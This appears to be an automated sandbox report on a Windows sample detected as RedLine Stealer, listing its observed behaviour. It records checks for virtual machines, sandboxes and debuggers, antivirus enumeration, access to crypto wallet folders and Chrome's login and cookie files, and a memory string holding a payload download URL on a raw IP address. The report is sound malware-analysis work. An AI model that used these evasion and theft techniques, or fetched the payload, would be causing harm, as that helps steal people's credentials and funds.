                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion:

                        barindex
                        Tries to detect Any.runShow sources
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeFile opened: C:\Program Files\qga\qga.exe
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeFile opened: C:\Program Files\qga\qga.exe
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                        Source: o4XzTr73Ut.exe, 00000000.00000002.843241720.00000000029A0000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1056932112.00000000022B0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
                        Source: o4XzTr73Ut.exe, 00000000.00000002.843241720.00000000029A0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1056932112.00000000022B0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTP://185.112.83.8/SOFTWARECLEANEDPHILOSF.BIN
                        Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)Show sources
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe TID: 5080Thread sleep time: -2767011611056431s >= -30000s
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exe TID: 2020Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A9B85 rdtsc
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeWindow / User API: threadDelayed 368
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeWindow / User API: threadDelayed 1434
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 12_2_000F0012 sldt word ptr [eax]
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_0040290B FindFirstFileW,
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeSystem information queried: ModuleInformation
                        Source: o4XzTr73Ut.exe, 00000000.00000002.843459982.000000000423A000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1056998589.00000000023CA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
                        Source: o4XzTr73Ut.exe, 00000000.00000002.843241720.00000000029A0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1062708597.0000000021540000.00000004.00000001.sdmpBinary or memory string: VMware
                        Source: o4XzTr73Ut.exe, 00000000.00000002.843459982.000000000423A000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1056998589.00000000023CA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1056998589.00000000023CA000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
                        Source: o4XzTr73Ut.exe, 00000000.00000002.843459982.000000000423A000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1056998589.00000000023CA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
                        Source: o4XzTr73Ut.exe, 00000000.00000002.843459982.000000000423A000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1056998589.00000000023CA000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
                        Source: o4XzTr73Ut.exe, 00000000.00000002.843459982.000000000423A000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1056998589.00000000023CA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1056932112.00000000022B0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=http://185.112.83.8/SoftwareCleanedPhilosf.bin
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1056998589.00000000023CA000.00000004.00000001.sdmpBinary or memory string: vmicvss
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1056735991.0000000000862000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
                        Source: o4XzTr73Ut.exe, 00000000.00000002.843241720.00000000029A0000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1056932112.00000000022B0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
                        Source: o4XzTr73Ut.exe, 00000000.00000002.843459982.000000000423A000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1056998589.00000000023CA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1056735991.0000000000862000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWR[
                        Source: o4XzTr73Ut.exe, 00000000.00000002.843459982.000000000423A000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1056998589.00000000023CA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1062708597.0000000021540000.00000004.00000001.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareM_N5ZXAGWin32_VideoController4NXN2WLBVideoController120060621000000.000000-0008.1096.1display.infMSBDAD6HFUU4TPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsDZ5DMBMEk
                        Source: o4XzTr73Ut.exe, 00000000.00000002.843459982.000000000423A000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1056998589.00000000023CA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1056998589.00000000023CA000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

                        Anti Debugging:

                        barindex
                        Hides threads from debuggersShow sources
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeThread information set: HideFromDebugger
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_72891BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A9B85 rdtsc
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A924F mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A973D mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028AA35F mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A5415 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A5078 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A5078 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A79DC mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A5908 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028AA146 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A7C3B LdrInitializeThunk,
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeMemory allocated: page read and write | page guard
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess created: C:\Users\user\Desktop\o4XzTr73Ut.exe "C:\Users\user\Desktop\o4XzTr73Ut.exe"
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1056764208.0000000000888000.00000004.00000020.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1062708597.0000000021540000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                        Stealing of Sensitive Information:

                        barindex
                        Yara detected RedLine StealerShow sources
                        Source: Yara matchFile source: 12.2.o4XzTr73Ut.exe.1e3e0000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.3.o4XzTr73Ut.exe.89add8.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.o4XzTr73Ut.exe.1e170f6e.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.o4XzTr73Ut.exe.1e170086.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.o4XzTr73Ut.exe.1e170f6e.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.o4XzTr73Ut.exe.20640000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.o4XzTr73Ut.exe.1e3e0ee8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.o4XzTr73Ut.exe.20640000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.3.o4XzTr73Ut.exe.89add8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.o4XzTr73Ut.exe.1e3e0000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.o4XzTr73Ut.exe.1e170086.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.o4XzTr73Ut.exe.1e3e0ee8.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.1061972250.0000000020640000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1061316952.000000001F5F7000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1060215267.000000001E3E0000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000003.1004258087.000000000089A000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1060066764.000000001E130000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: o4XzTr73Ut.exe PID: 6324, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Tries to steal Crypto Currency WalletsShow sources
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Tries to harvest and steal browser information (history, passwords, etc)Show sources
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: Yara matchFile source: Process Memory Space: o4XzTr73Ut.exe PID: 6324, type: MEMORYSTR

                        Remote Access Functionality:

                        barindex
                        Yara detected RedLine StealerShow sources
                        Source: Yara matchFile source: 12.2.o4XzTr73Ut.exe.1e3e0000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.3.o4XzTr73Ut.exe.89add8.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.o4XzTr73Ut.exe.1e170f6e.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.o4XzTr73Ut.exe.1e170086.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.o4XzTr73Ut.exe.1e170f6e.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.o4XzTr73Ut.exe.20640000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.o4XzTr73Ut.exe.1e3e0ee8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.o4XzTr73Ut.exe.20640000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.3.o4XzTr73Ut.exe.89add8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.o4XzTr73Ut.exe.1e3e0000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.o4XzTr73Ut.exe.1e170086.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.o4XzTr73Ut.exe.1e3e0ee8.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.1061972250.0000000020640000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1061316952.000000001F5F7000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1060215267.000000001E3E0000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000003.1004258087.000000000089A000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1060066764.000000001E130000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: o4XzTr73Ut.exe PID: 6324, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid AccountsWindows Management Instrumentation221Path InterceptionAccess Token Manipulation1Masquerading1OS Credential Dumping1Security Software Discovery541Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
                        Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection11Disable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion441Security Account ManagerVirtualization/Sandbox Evasion441SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Access Token Manipulation1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection11LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol111Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsSystem Information Discovery126VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        o4XzTr73Ut.exe7%VirustotalBrowse
                        o4XzTr73Ut.exe23%ReversingLabsWin32.Trojan.Shelsy

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\nsb3A92.tmp\System.dll3%MetadefenderBrowse
                        C:\Users\user\AppData\Local\Temp\nsb3A92.tmp\System.dll0%ReversingLabs

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

